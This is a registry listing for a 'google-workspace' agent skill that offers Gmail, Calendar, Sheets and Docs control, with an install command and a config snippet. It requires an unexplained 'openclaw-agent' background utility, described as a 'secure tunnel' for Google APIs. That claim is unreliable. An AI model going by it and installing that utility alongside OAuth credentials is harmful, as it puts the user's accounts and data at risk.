ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified productivity Safety 3/5

google-workspace

Interact with Google Workspace services - Gmail, Calendar, Contacts, Sheets, and Docs. Send emails, manage calendar events, read/write spreadsheets, create documents, and sync contacts.

Why use this skill?

Seamlessly control Gmail, Calendar, Sheets, and Docs with OpenClaw. Automate your workflow, manage schedules, and process documents using this powerful Google Workspace integration.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/google-workspace-izypr
Or

What This Skill Does

The Google Workspace skill for OpenClaw is a powerful integration layer designed to unify your workflow by connecting the agent directly to your Gmail, Google Calendar, Sheets, and Docs. By utilizing this skill, your AI agent can manage your professional life with autonomy, acting as a personal assistant that handles email triage, meeting scheduling, data entry, and documentation creation. It bridges the gap between your conversational commands and the complex Google API ecosystem, enabling seamless interactions with your cloud data.

Installation

To begin using the Google Workspace skill, first ensure you have the openclaw-agent utility installed on your system, which handles the secure tunnel required for Google API operations. Once the utility is ready, install the skill package via the ClawHub terminal command: clawhub install openclaw/skills/skills/hightower6eu/google-workspace-izypr. You must then configure your own Google Cloud Platform project by enabling the necessary APIs (Gmail, Calendar, Sheets, Docs, and People API), generating OAuth 2.0 credentials, and placing the credentials.json file in your working directory to allow the agent to authenticate with your account securely.

Use Cases

This skill is perfect for busy professionals and developers. Use it to automate daily email summaries by having the agent fetch and condense your latest messages. Organize your schedule by delegating meeting creation and RSVP management to the agent. Automate repetitive data collection tasks by having the agent update a Google Sheet with specific metrics periodically, or quickly generate project documentation drafts directly in Google Docs based on your voice notes or meeting transcripts.

Example Prompts

  1. "Check my inbox for any urgent emails from my manager and summarize the top three points."
  2. "Schedule a 30-minute team sync for next Tuesday at 10 AM and invite the engineering team via my Google Calendar."
  3. "Open the Q3 Sales tracker spreadsheet and update the row for today with the values provided in this document."

Tips & Limitations

Always ensure your openclaw-agent is running before invoking commands, as local API connectivity depends on this background service. Note that Google imposes strict quotas on API requests; if you have a massive volume of emails or documents, be mindful of these limits. For enhanced security, verify the token.pickle file is stored in a non-public, local directory, and remember that the first time you run this skill, you must complete the OAuth 2.0 consent screen flow in your browser to grant the required permissions.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-google-workspace-izypr": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#google#productivity#automation#email#sheets
Safety Score: 3/5

Flags: network-access, file-read, file-write, external-api, code-execution